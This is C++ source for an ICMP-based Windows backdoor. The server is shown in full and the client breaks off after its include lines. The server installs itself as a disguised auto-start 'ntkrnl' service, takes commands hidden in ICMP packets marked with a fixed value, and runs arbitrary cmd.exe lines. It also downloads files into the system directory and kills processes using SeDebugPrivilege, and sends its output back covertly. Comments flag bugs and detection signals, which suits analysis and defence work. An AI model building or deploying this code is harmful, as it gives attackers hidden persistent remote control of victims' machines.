IcmpBackDoor

服务端(Server.cpp):

  1 #include <winsock2.h>
  2 #include <stdio.h>
  3 #include <urlmon.h> 
  4 #include <tlhelp32.h>
  5 #pragma comment(lib, "Urlmon.lib")
  6 #pragma comment(lib, "ws2_32.lib")
  7  
  8 #define ICMP_PASSWORD 1234 //magic value the server expects in the ICMP sequence field; a packet is only acted on when i_seq equals it (see decode_resp). It travels in clear, so it is a signature, not a secret
  9 #define STATUS_FAILED 0xFFFF //process exit code used when Winsock initialisation or raw-socket creation fails
 10 #define MAX_PACKET 6500 //byte size of the heap buffers used for one outgoing and one incoming ICMP packet
 11 #define xmalloc(s) HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) //zero-filled allocation from the process heap; no caller in this file ever frees it
 12  
 13 /* The IPv4 header; only h_len is used here, to locate the ICMP header behind a variable-length IP header (decode_resp) */
 14 typedef struct iphdr {
 15     unsigned int h_len:4; //4-bit header length, in 32-bit words
 16     unsigned int version:4; //4-bit IP version; 4 means IPv4
 17     unsigned char tos; //8-bit type of service
 18     unsigned short total_len; //16-bit total length in bytes
 19     unsigned short ident; //16-bit identification
 20     unsigned short frag_and_flags; //3 flag bits plus fragment offset
 21     unsigned char ttl; //8-bit time to live
 22     unsigned char proto; //8-bit protocol (TCP, UDP or other)
 23     unsigned short checksum; //16-bit IP header checksum
 24     unsigned int sourceIP; //32-bit source IP address
 25     unsigned int destIP; //32-bit destination IP address
 26 }IpHeader;
 27  
 28 //ICMP header as used by this program: the 8-byte echo header followed by a 4-byte timestamp, 12 bytes in total (decode_resp hard-codes that 12)
 29 typedef struct _ihdr 
 30 {
 31     BYTE i_type; //8-bit type; both sides send type 0 (echo reply), so this traffic never looks like a ping request
 32     BYTE i_code; //8-bit code
 33     USHORT i_cksum; //16-bit checksum over header plus payload
 34     USHORT i_id; //identifier (the sender's process id is used)
 35     USHORT i_seq; //sequence number, repurposed as the protocol marker: 1234 inbound (ICMP_PASSWORD), 4321 outbound (fill_icmp_data)
 36     ULONG timestamp; //tick count at send time
 37 }IcmpHeader;
 38 char arg[256]; //raw command text copied out of the last accepted packet by decode_resp; not guaranteed NUL-terminated
 39 char buffer[2048] = {0}; //reply text (captured command output or a status string) that send() carries back in the ICMP payload
 40 void decode_resp(char *,int ,struct sockaddr_in *); //parses one received ICMP packet and dispatches the embedded command
 41 void fill_icmp_data(char * icmp_data); //writes the outgoing ICMP header (seq 4321) and appends buffer as payload
 42 void pslist(void); //appends a "name<tab><tab>pid" line per running process to buffer
 43 BOOL killps(DWORD id); //terminates process id after enabling SeDebugPrivilege on this process token
 44 void send(void); //sends buffer to ICMP_DEST_IP in one ICMP packet; note the name collides with the Winsock send()
 45 char *ICMP_DEST_IP; //dotted-quad source address of the last accepted packet; replies go there, whoever sent it
 46 USHORT checksum(USHORT *buffer, int size); //RFC 1071 one's-complement checksum
 47  
 48 HANDLE                hMutex; //waited on and closed in CmdControl, but never created anywhere in this listing
 49 SERVICE_STATUS        ServiceStatus; //status record reported to the Service Control Manager
 50 SERVICE_STATUS_HANDLE ServiceStatusHandle; //handle returned by RegisterServiceCtrlHandler
 51 void  WINAPI ICMP_CmdStart(DWORD,LPTSTR *); //ServiceMain for the "ntkrnl" service
 52 void  WINAPI CmdControl(DWORD); //SCM control handler (pause/continue/stop)
 53 DWORD WINAPI CmdService(LPVOID); //worker thread: raw ICMP receive loop
 54 void  InstallCmdService(void); //copies this binary to the system directory and registers/starts the service
 55 void  RemoveCmdService(void); //stops and deletes the service and removes the dropped binary
 56 void  usage(char *par); //prints the banner and command-line usage
 57 int main(int argc,char *argv[]) //entry point: "-install"/"-remove" administer the service; with no arguments the process hands itself to the SCM dispatcher
 58 {
 59     SERVICE_TABLE_ENTRY DispatchTable[]={{"ntkrnl",ICMP_CmdStart},{NULL,NULL}}; //service name "ntkrnl": a kernel-sounding name for a user-mode service, worth checking for in the service list
 60     if(argc==2)
 61     {
 62         if(!stricmp(argv[1],"-install"))
 63         {
 64             //usage(argv[0]);
 65             InstallCmdService();
 66             printf("InstallCmdService\n");
 67         }
 68         else if(!stricmp(argv[1],"-remove"))
 69         {
 70             //usage(argv[0]);
 71             RemoveCmdService();
 72             printf("RemoveCmdService\n");
 73         }
 74         else usage(argv[0]);
 75         return 0; //administrative invocations never reach the dispatcher
 76     }
 77     else usage(argv[0]); //argc!=2 (which is how the SCM launches the image, with no arguments): print usage and fall through
 78  
 79  
 80     StartServiceCtrlDispatcher(DispatchTable); //blocks for the lifetime of the service; its return value is not checked
 81     return 0;
 82 }
 83 void WINAPI ICMP_CmdStart(DWORD dwArgc,LPTSTR *lpArgv) //ServiceMain: registers the control handler, reports RUNNING, then starts the ICMP worker thread
 84 {
 85     HANDLE    hThread;
 86     ServiceStatus.dwServiceType             = SERVICE_WIN32;
 87     ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
 88     ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
 89     ServiceStatus.dwServiceSpecificExitCode = 0;
 90     ServiceStatus.dwWin32ExitCode           = 0;
 91     ServiceStatus.dwCheckPoint              = 0;
 92     ServiceStatus.dwWaitHint                = 0;
 93     ServiceStatusHandle=RegisterServiceCtrlHandler("ntkrnl",CmdControl); //same service name as main's dispatch table
 94     if(ServiceStatusHandle==0)
 95     {
 96         OutputDebugString("RegisterServiceCtrlHandler Error !\n"); //errors go to the debugger output only; a service has no console
 97         return ;
 98     }
 99     ServiceStatus.dwCurrentState = SERVICE_RUNNING; //RUNNING is reported before the worker thread exists
100     ServiceStatus.dwCheckPoint   = 0;
101     ServiceStatus.dwWaitHint     = 0;
102  
103     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
104     {
105         OutputDebugString("SetServiceStatus in CmdStart Error !\n");
106         return ;
107     }
108     hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL); //all real work happens in CmdService; the thread handle is never closed
109     if(hThread==NULL)
110     {
111         OutputDebugString("CreateThread in CmdStart Error !\n"); //the service stays reported as RUNNING even though no worker started
112     }
113     return ;
114 }
115 void WINAPI CmdControl(DWORD dwCode) //SCM control handler: updates ServiceStatus for pause/continue/stop and reports it back
116 {
117     switch(dwCode)
118     {
119     case SERVICE_CONTROL_PAUSE:
120         ServiceStatus.dwCurrentState = SERVICE_PAUSED; //state only: CmdService never reads ServiceStatus, so pausing does not stop packet handling
121         break;
122     case SERVICE_CONTROL_CONTINUE:
123         ServiceStatus.dwCurrentState = SERVICE_RUNNING;
124         break;
125     case SERVICE_CONTROL_STOP:
126         WaitForSingleObject(hMutex,INFINITE); //hMutex is never created in this listing, so this presumably waits on a NULL handle and returns at once
127         ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
128         ServiceStatus.dwWin32ExitCode = 0;
129         ServiceStatus.dwCheckPoint    = 0;
130         ServiceStatus.dwWaitHint      = 0;
131         if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
132         {
133             OutputDebugString("SetServiceStatus in CmdControl in Switch Error !\n");
134         }
135         ReleaseMutex(hMutex);
136         CloseHandle(hMutex);
137         return ; //STOPPED is reported, but the CmdService thread is not told to exit
138     case SERVICE_CONTROL_INTERROGATE:
139         break;
140     default:
141         break;
142     }
143     if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
144     {
145         OutputDebugString("SetServiceStatus in CmdControl out Switch Error !\n");
146     }
147     return ;
148 }
149 DWORD WINAPI CmdService(LPVOID lpParam) //service worker: opens a raw ICMP socket and hands every received packet to decode_resp, forever
150 {   
151     char *icmp_data;
152     int bread,datasize,retval;
153     SOCKET sockRaw = (SOCKET)NULL;
154     WSADATA wsaData;
155     struct sockaddr_in dest,from;
156     int fromlen = sizeof(from);
157     int timeout = 2000; //receive timeout in ms; on timeout the loop simply retries
158     char *recvbuf;
159  
160     if ((retval = WSAStartup(MAKEWORD(2,1),&wsaData)) != 0)
161     {
162         printf("WSAStartup failed: %s\n",retval); //retval is an int printed with %s (format mismatch); a service has no console anyway
163         ExitProcess(STATUS_FAILED);
164     }
165     sockRaw = WSASocket (AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED); //raw ICMP socket: needs administrative rights, and a service process holding one is itself a detection signal
166     if (sockRaw == INVALID_SOCKET)
167     {
168         printf("WSASocket() failed: %s\n",WSAGetLastError()); //same %s/int mismatch as above
169         ExitProcess(STATUS_FAILED);
170     }
171     __try{
172         bread = setsockopt(sockRaw,SOL_SOCKET,SO_RCVTIMEO,(char*)&timeout,sizeof(timeout));
173         if(bread == SOCKET_ERROR) __leave;
174  
175         memset(&dest,0,sizeof(dest));
176         dest.sin_family = AF_INET; //sin_addr stays 0.0.0.0: dest is never given a real address
177         datasize=0;
178         datasize += sizeof(IcmpHeader); //12 bytes, header only
179         icmp_data =(char*)xmalloc(MAX_PACKET);
180         recvbuf = (char*)xmalloc(MAX_PACKET); //allocation result is not checked (only icmp_data is)
181         if (!icmp_data) {
182             //fprintf(stderr,"HeapAlloc failed %d\n",GetLastError());
183             __leave;
184         }
185         memset(icmp_data,0,MAX_PACKET);
186         for(;;) {
187             int bwrote;
188             bwrote = sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //sends an all-zero 12-byte ICMP header to 0.0.0.0 on every pass; the result is ignored
189             bread = recvfrom(sockRaw,recvbuf,MAX_PACKET,0,(struct sockaddr*)&from,&fromlen); //a raw socket sees ICMP traffic addressed to this host, not just this program's
190             if (bread == SOCKET_ERROR)
191             {
192                 if (WSAGetLastError() == WSAETIMEDOUT)continue;
193                 __leave; //any other socket error ends the service loop
194             }
195             decode_resp(recvbuf,bread,&from);
196             Sleep(200);
197             memset(recvbuf,0,sizeof(recvbuf)); //sizeof a pointer, so only a few leading bytes are cleared; the rest of the previous packet stays in recvbuf
198         }
199     }
200     __finally {
201         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
202         WSACleanup();
203     }
204     return 0;
205 }
206  
207  
208 void InstallCmdService(void) //persistence installer: drops a copy of this executable as ntkrnl.exe in the system directory, registers it as an auto-start service and starts it
209 {
210     SC_HANDLE        schSCManager;
211     SC_HANDLE        schService;
212     char             lpCurrentPath[MAX_PATH];
213     char             lpImagePath[MAX_PATH];
214     char             *lpHostName;
215     WIN32_FIND_DATA  FileData;
216     HANDLE           hSearch;
217     DWORD            dwErrorCode;
218     SERVICE_STATUS   InstallServiceStatus; //only written by QueryServiceStatus; read uninitialised at the end if that call never succeeds
219  
220     GetSystemDirectory(lpImagePath,MAX_PATH);
221     strcat(lpImagePath,"\\ntkrnl.exe"); //dropped file: <system directory>\ntkrnl.exe
222     lpHostName=NULL; //local SCM
223  
224     printf("Transmitting File ... ");
225     hSearch=FindFirstFile(lpImagePath,&FileData); //copy only when the target does not exist yet
226     if(hSearch==INVALID_HANDLE_VALUE)
227     {
228         GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); //the source is the running executable itself
229         if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0) 
230         {
231             dwErrorCode=GetLastError();
232             if(dwErrorCode==5) //5 == ERROR_ACCESS_DENIED
233             {
234                 printf("Failure ... Access is Denied !\n");
235             }
236             else
237             {
238                 printf("Failure !\n");
239             }
240             return ;
241         }
242         else
243         {
244             printf("Success !\n");
245         }
246     }
247     else
248     {
249         printf("already Exists !\n");
250         FindClose(hSearch);
251     }
252     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS); //full SCM access: needs an administrative token
253     if(schSCManager==NULL)
254     {
255         printf("Open Service Control Manager Database Failure !\n");
256         return ;
257     }
258     printf("Creating Service .... ");
259     schService=CreateService(schSCManager,"ntkrnl","ntkrnl",SERVICE_ALL_ACCESS, //service name and display name are both "ntkrnl"
260         SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, //auto-start: runs at every boot
261         SERVICE_ERROR_IGNORE,"ntkrnl.exe",NULL,NULL,NULL,NULL,NULL); //bare relative image name; no account is given, so the service runs as LocalSystem
262     if(schService==NULL)
263     {
264         dwErrorCode=GetLastError();
265         if(dwErrorCode!=ERROR_SERVICE_EXISTS)
266         {
267             printf("Failure !\n");
268             CloseServiceHandle(schSCManager);
269             return ;
270         }
271         else
272         {
273             printf("already Exists !\n");
274             schService=OpenService(schSCManager,"ntkrnl",SERVICE_START); //opened with SERVICE_START only; the QueryServiceStatus calls below presumably need SERVICE_QUERY_STATUS as well
275             if(schService==NULL)
276             {
277                 printf("Opening Service .... Failure !\n");
278                 CloseServiceHandle(schSCManager);
279                 return ;
280             }
281         }
282     }
283     else
284     {
285         printf("Success !\n");
286     }
287     printf("Starting Service .... ");
288     if(StartService(schService,0,NULL)==0)
289     {
290         dwErrorCode=GetLastError();
291         if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
292         {
293             printf("already Running !\n");
294             CloseServiceHandle(schSCManager);
295             CloseServiceHandle(schService);
296             return ;
297         }
298     } //other StartService errors are not reported here; the status poll below prints Failure instead
299     else
300     {
301         printf("Pending ... ");
302     }
303     while(QueryServiceStatus(schService,&InstallServiceStatus)!=0) //poll until the service leaves START_PENDING
304     {
305         if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
306         {
307             Sleep(100);
308         }
309         else
310         {
311             break;
312         }
313     }
314     if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING) //uninitialised read if QueryServiceStatus failed on its first call
315     {
316         printf("Failure !\n");
317     }
318     else
319     {
320         printf("Success !\n");
321     }
322     CloseServiceHandle(schSCManager);
323     CloseServiceHandle(schService);
324     return ;
325 }
326 void RemoveCmdService(void) //uninstaller: stops and deletes the "ntkrnl" service, then deletes <system directory>\ntkrnl.exe
327 {
328     SC_HANDLE        schSCManager;
329     SC_HANDLE        schService;
330     char             lpImagePath[MAX_PATH];
331     char             *lpHostName;
332     WIN32_FIND_DATA  FileData;
333     SERVICE_STATUS   RemoveServiceStatus;
334     HANDLE           hSearch;
335     DWORD            dwErrorCode;
336  
337     GetSystemDirectory(lpImagePath,MAX_PATH);
338     strcat(lpImagePath,"\\ntkrnl.exe"); //same path InstallCmdService drops the file at
339     lpHostName=NULL; //local SCM
340  
341     schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
342     if(schSCManager==NULL)
343     {
344         printf("Opening SCM ......... ");
345         dwErrorCode=GetLastError();
346         if(dwErrorCode!=5) //5 == ERROR_ACCESS_DENIED
347         {
348             printf("Failure !\n");
349         }
350         else
351         {
352             printf("Failuer ... Access is Denied !\n");
353         }
354         return ;
355     }
356     schService=OpenService(schSCManager,"ntkrnl",SERVICE_ALL_ACCESS);
357     if(schService==NULL) 
358     {
359         printf("Opening Service ..... ");
360         dwErrorCode=GetLastError();
361         if(dwErrorCode==1060) //1060 == ERROR_SERVICE_DOES_NOT_EXIST
362         {
363             printf("no Exists !\n");
364         }
365         else
366         {
367             printf("Failure !\n");
368         }
369         CloseServiceHandle(schSCManager); //closed a second time after the if/else below, where a NULL schService is closed too
370     }
371     else
372     {
373         printf("Stopping Service .... ");
374         if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
375         {
376             if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
377             {
378                 printf("already Stopped !\n");
379             }
380             else
381             {
382                 printf("Pending ... ");
383                 if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0) //delivered to CmdControl's STOP case
384                 {
385                     while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING) //QueryServiceStatus result is unchecked; the loop runs on the last status read
386                     {
387                         Sleep(10);
388                         QueryServiceStatus(schService,&RemoveServiceStatus);
389                     }
390                     if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED)
391                     {
392                         printf("Success !\n");
393                     }
394                     else
395                     {
396                         printf("Failure !\n");
397                     }
398                 }
399                 else
400                 {
401                     printf("Failure !\n");
402                 }
403             }
404         }
405         else
406         {
407             printf("Query Failure !\n");
408         }
409         printf("Removing Service .... ");
410         if(DeleteService(schService)==0) //marks the service for deletion; it disappears once all handles to it are closed
411         {
412             printf("Failure !\n");
413         }
414         else
415         {
416             printf("Success !\n");
417         }
418     }
419     CloseServiceHandle(schSCManager);
420     CloseServiceHandle(schService);
421     printf("Removing File ....... ");
422     Sleep(1500); //presumably gives the stopped service process time to exit before its image is deleted
423     hSearch=FindFirstFile(lpImagePath,&FileData);
424     if(hSearch==INVALID_HANDLE_VALUE)
425     {
426         printf("no Exists !\n");
427     }
428     else
429     {
430         if(DeleteFile(lpImagePath)==0) //when reached from decode_resp's "remove" command this is presumably the running service's own image, which may still be mapped
431         {
432             printf("Failure !\n");
433         }
434         else
435         {
436             printf("Success !\n");
437         }
438         FindClose(hSearch);
439     }
440     return ;
441 }
442 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) //command dispatcher for one received ICMP packet: checks the seq marker, then handles pskill, pslist, remove, an http download, or an arbitrary cmd.exe line
443 {
444  
445     IpHeader *iphdr;
446     IcmpHeader *icmphdr;
447     unsigned short iphdrlen;
448     iphdr = (IpHeader *)buf; //raw ICMP sockets deliver the IP header in front of the ICMP header
449     iphdrlen = iphdr->h_len * 4 ; //h_len counts 32-bit words
450     icmphdr = (IcmpHeader*)(buf + iphdrlen); //bytes is never compared with iphdrlen+12, so a short packet is read beyond its end
451     if(icmphdr->i_seq==ICMP_PASSWORD) //the whole authentication: a fixed 16-bit value in the sequence field
452     {
453         ICMP_DEST_IP=inet_ntoa(from->sin_addr); //replies go to the packet's source address, whoever sent it (inet_ntoa returns a static buffer)
454         memcpy(arg,buf+iphdrlen+12,256); //always copies 256 bytes after the 12-byte ICMP header, regardless of bytes
455         if (!memcmp(arg,"pskill",6))
456         {
457             killps(atoi(strstr(arg," "))); //with no space in arg, strstr returns NULL and atoi(NULL) is undefined
458             memcpy(buffer,"Process is Killed!",sizeof("Process is Killed!")); //reported regardless of killps' result
459             send();
460         }
461  
462         else if (!memcmp(arg,"pslist",6)){pslist();send();}
463         else if (!strcmp(arg,"remove\n")) //self-uninstall; exact match including the newline the client's fgets keeps
464         {
465             RemoveCmdService();
466             memcpy(buffer,"Service Removed!",sizeof("Service Removed!"));
467             send();
468             return;
469         }
470         ////////////************    http download   *************
471         else if (!memcmp(arg,"http://",7))   //"http://<url> -<name>": fetch the URL into the system directory as <name>
472         {
473             if(char *FileName=strstr(arg,"-")) //C++ declaration in a condition; the first '-' separates URL from file name
474             {
475  
476                 char url[200]; //URL copy; the length taken below is not checked against 200
477                 memset(url,0,200);
478                 memcpy(url,arg,int(FileName-arg-1)); //everything up to the character before '-' (presumably the separating space)
479                 char fname[MAX_PATH];
480                 GetSystemDirectory(fname,MAX_PATH);
481                 FileName++;
482                 strcat(fname,"//"); //forward slashes, which Win32 path handling accepts
483                 strcat(fname,FileName); //rest of the line, newline included; not bounded against MAX_PATH
484                 *strstr(fname,"\n")=NULL; //strips the newline; dereferences NULL when the line has none
485                 HRESULT hRet=URLDownloadToFile(0,url,fname,0,0); //urlmon fetch from inside the service, written into the system directory
486                 memset(buffer,0,sizeof(buffer));
487                 if(hRet==S_OK) memcpy(buffer,"Download OK!\n",sizeof("Download OK\n")); //sizeof of the shorter literal: the NUL is not copied, harmless only because buffer was just zeroed
488                 else 
489                     memcpy(buffer,"Download Failure!\n",sizeof("Download Failure!\n"));
490                 send();
491                 return;
492             }
493         } //an http line without '-' is silently ignored (no reply)
494         //*******************************************
495         else{ //anything else is run by cmd.exe with stdout and stderr captured through an anonymous pipe
496             SECURITY_ATTRIBUTES sa; //inheritable pipe handles so the child can write into it
497             HANDLE hRead,hWrite;
498             sa.nLength = sizeof(SECURITY_ATTRIBUTES);
499             sa.lpSecurityDescriptor = NULL;
500             sa.bInheritHandle = TRUE;
501             if (!CreatePipe(&hRead,&hWrite,&sa,0)) 
502             {
503                 printf("Error On CreatePipe()"); //console only; nothing is sent back
504                 return;
505             }
506  
507             STARTUPINFO si;
508             PROCESS_INFORMATION pi; 
509             si.cb = sizeof(STARTUPINFO);
510             GetStartupInfo(&si); 
511             si.hStdError = hWrite;
512             si.hStdOutput = hWrite; //stdin is left as inherited
513             si.wShowWindow = SW_HIDE;
514             si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
515             char cmdline[270];
516             GetSystemDirectory(cmdline,MAX_PATH+1);
517             strcat(cmdline,"//cmd.exe /c"); //note: no space before the command text
518             strcat(cmdline,arg); //up to 256 bytes appended after the system directory path; the 270-byte cmdline can be exceeded
519             if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) //hidden cmd.exe spawned by the service process with inherited handles: the process-tree shape to look for
520             {
521                 printf("Error on CreateProcess()");
522                 return; //pipe handles leak on this path
523             }
524             CloseHandle(hWrite); //parent releases its write end so ReadFile reaches EOF once the child exits
525  
526  
527             DWORD bytesRead;
528             for(;;){
529                 if (!ReadFile(hRead,buffer,2048,&bytesRead,NULL))break; //every read starts at buffer[0], so only the last chunk survives; no NUL is appended
530                 Sleep(200);
531             }
532             //printf("%s",buffer);
533             /////////////////////////////////////////////
534             //send the captured output
535             send(); //hRead, pi.hProcess and pi.hThread are never closed
536         }
537         ////////////////////////////////////////////////
538  
539     }
540     //else printf("Other ICMP Packets!\n");
541     //printf(endl; 
542 }
543  
544  
USHORT checksum(USHORT *buffer, int size) //RFC 1071 Internet checksum over size bytes at buffer: one's-complement sum of 16-bit words, folded and inverted
{
    unsigned long acc = 0;
    USHORT *word = buffer;
    int left = size;

    // Add every full 16-bit word.
    for (; left > 1; left -= sizeof(USHORT)) {
        acc += *word++;
    }
    // A trailing odd byte contributes its zero-extended value.
    if (left) {
        acc += *(UCHAR *)word;
    }
    // Fold the carries back into the low 16 bits; two folds suffice for any 32-bit sum.
    acc = (acc >> 16) + (acc & 0xffff);
    acc += acc >> 16;
    return (USHORT)(~acc);
}
560  
561 void fill_icmp_data(char * icmp_data) //builds the reply packet in icmp_data: 12-byte header (type 0 = echo reply, seq 4321) followed by the text in buffer
562 {
563     IcmpHeader *icmp_hdr;
564     char *datapart;
565     icmp_hdr = (IcmpHeader*)icmp_data;
566     icmp_hdr->i_type = 0; //echo reply: replies never look like ping requests on the wire
567     icmp_hdr->i_code = 0;
568     icmp_hdr->i_id = (USHORT) GetCurrentProcessId();
569     icmp_hdr->i_cksum = 0; //the checksum is filled in by the caller (send) afterwards
570     icmp_hdr->i_seq =4321; //marker the client's decode_resp looks for
571     icmp_hdr->timestamp = GetTickCount(); //tick count at send time
572     datapart = icmp_data + sizeof(IcmpHeader);
573     memcpy(datapart,buffer,strlen(buffer)); //text only, no NUL; buffer (2048) always fits in the MAX_PACKET (6500) allocation
574     //for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i]; 
575 }
void  usage(char *par) //prints the banner followed by the -install / -remove usage lines for the executable name par
{
    static const char *banner[] = {
        "\t\t=====Welcome to www.hackerxfiles.net======\n",
        "\n",
        "\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n",
        "\t\t---[ E-mail: gxisone@hotmail.com      ]---\n",
        "\t\t---[                        2003/8/15 ]---\n",
        "\n",
    };
    size_t i;
    // Constant lines go out unformatted; only the two usage lines need the program name.
    for (i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        fputs(banner[i], stdout);
    }
    printf("\t\tUsage: %s -install (to install service)\n", par);
    printf("\t\t       %s -remove (to remove service)\n", par);
    fputs("\n", stdout);
}
590 void send(void) //sends the text in buffer to ICMP_DEST_IP as a single ICMP packet (seq 4321), then clears buffer
591 {
592     WSADATA wsaData;
593     SOCKET sockRaw = (SOCKET)NULL;
594     struct sockaddr_in dest;
595     int bread,datasize,retval,bwrote;
596     int timeout = 1000; //send timeout in ms
597     char *icmp_data;
598     if((retval=WSAStartup(MAKEWORD(2,1),&wsaData)) != 0) ExitProcess(STATUS_FAILED); //a failure here ends the whole service process
599     if((sockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL,0,WSA_FLAG_OVERLAPPED))
600         ==INVALID_SOCKET) ExitProcess(STATUS_FAILED); //a new raw socket per reply, separate from the one CmdService receives on
601     __try
602     {
603         if((bread=setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&timeout,sizeof(timeout)))==SOCKET_ERROR) __leave;
604         //send timeout set above
605         memset(&dest,0,sizeof(dest));
606         dest.sin_family = AF_INET;
607         dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP); //reply target recorded by decode_resp from the incoming packet's source
608         datasize=strlen(buffer);
609         datasize+=sizeof(IcmpHeader); //header plus text; both the checksum and sendto use this length
610         icmp_data=(char*)xmalloc(MAX_PACKET); //never freed
611         if(!icmp_data) __leave;
612         memset(icmp_data,0,MAX_PACKET);
613         fill_icmp_data(icmp_data); //fill the ICMP header and payload
614         ((IcmpHeader*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, datasize); //checksum over header and payload
615         bwrote=sendto(sockRaw,icmp_data,datasize,0,(struct sockaddr*)&dest,sizeof(dest)); //send the packet
616         if (bwrote == SOCKET_ERROR)
617         {
618             //if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
619             //printf("sendto failed:"<<WSAGetLastError()<<endl;
620             __leave; //send errors are silent
621         }
622         //printf("Send Packet to %s Success!\n"<<ICMP_DEST_IP<<endl;
623     }
624  
625     __finally 
626     {
627         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
628         WSACleanup();
629     }
630     memset(buffer,0,sizeof(buffer)); //buffer is a real array here, so the whole reply text is cleared
631     Sleep(200);
632 }
633 void pslist(void) //appends one "<exe name>\t\t<pid>\n" line per running process to the global buffer, using a Toolhelp snapshot
634 {
635     HANDLE hProcessSnap = NULL;
636     PROCESSENTRY32 pe32= {0};
637     hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
638     if (hProcessSnap == (HANDLE)-1) //INVALID_HANDLE_VALUE
639     {
640         printf("\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
641         return ;
642     }
643     pe32.dwSize = sizeof(PROCESSENTRY32);
644     printf("\nProcessName     ProcessID"); //console only; not part of the reply
645     if (Process32First(hProcessSnap, &pe32))
646     {
647         char a[5]; //itoa target: room for 4 digits plus NUL, less than a PID can need
648         do
649         {
650             strcat(buffer,pe32.szExeFile); //unbounded appends into the 2048-byte buffer; nothing stops at its end
651             strcat(buffer,"\t\t");
652             itoa(pe32.th32ProcessID,a,10);
653             strcat(buffer,a);
654             strcat(buffer,"\n");
655             //printf("\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
656         }
657         while (Process32Next(hProcessSnap, &pe32));
658     }
659     else
660     {
661         printf("\nProcess32Firstt() failed:%d",GetLastError());
662     }
663     CloseHandle (hProcessSnap);
664     return;
665 }
666 BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) //enables (or disables) one named privilege on hToken; the standard AdjustTokenPrivileges pattern
667 {
668     TOKEN_PRIVILEGES tp;
669     LUID luid;
670     if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) //resolve the privilege name to its LUID on the local system
671     {
672         printf("\nLookupPrivilegeValue error:%d", GetLastError() ); 
673         return FALSE; 
674     }
675     tp.PrivilegeCount = 1;
676     tp.Privileges[0].Luid = luid;
677     if (bEnablePrivilege)
678         tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
679     else
680         tp.Privileges[0].Attributes = 0;
681     // Enable the privilege or disable all privileges.
682     AdjustTokenPrivileges(
683         hToken, 
684         FALSE, 
685         &tp, 
686         sizeof(TOKEN_PRIVILEGES), 
687         (PTOKEN_PRIVILEGES) NULL, 
688         (PDWORD) NULL); 
689     // Call GetLastError to determine whether the function succeeded: AdjustTokenPrivileges can return TRUE yet set ERROR_NOT_ALL_ASSIGNED when the token lacks the privilege.
690     if (GetLastError() != ERROR_SUCCESS) 
691     { 
692         printf("AdjustTokenPrivileges failed: %u\n", GetLastError() ); 
693         return FALSE; 
694     } 
695     return TRUE;
696 }
697 ////////////////////////////////////////////////////////////////////////////
698 BOOL killps(DWORD id) //terminates process id: enables SeDebugPrivilege on this process token, opens the target with full access, then TerminateProcess; returns TRUE only if the terminate call succeeded
699 {
700     HANDLE hProcess=NULL,hProcessToken=NULL;
701     BOOL IsKilled=FALSE,bRet=FALSE; //bRet is never used
702     __try
703     {
704         if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
705         {
706             printf("\nOpen Current Process Token failed:%d",GetLastError());
707             __leave;
708         }
709         //printf("\nOpen Current Process Token ok!");
710         if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)) //SeDebugPrivilege lets the service open processes it could not otherwise touch; a service enabling it is worth alerting on
711         {
712             __leave;
713         }
714         printf("\nSetPrivilege ok!"); //console only
715         if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
716         {
717             printf("\nOpen Process %d failed:%d",id,GetLastError());
718             __leave;
719         }
720         //printf("\nOpen Process %d ok!",id);
721         if(!TerminateProcess(hProcess,1)) //exit code 1 for the target
722         {
723             printf("\nTerminateProcess failed:%d",GetLastError());
724             __leave;
725         }
726         IsKilled=TRUE;
727     }
728     __finally
729     {
730         if(hProcessToken!=NULL) CloseHandle(hProcessToken); //the privilege stays enabled on the process token after this
731         if(hProcess!=NULL) CloseHandle(hProcess);
732     }
733     return(IsKilled);
734 }

客户端(Client.cpp):

  1 #include <winsock2.h>
  2 #include <stdio.h>
  3 #include <stdlib.h>
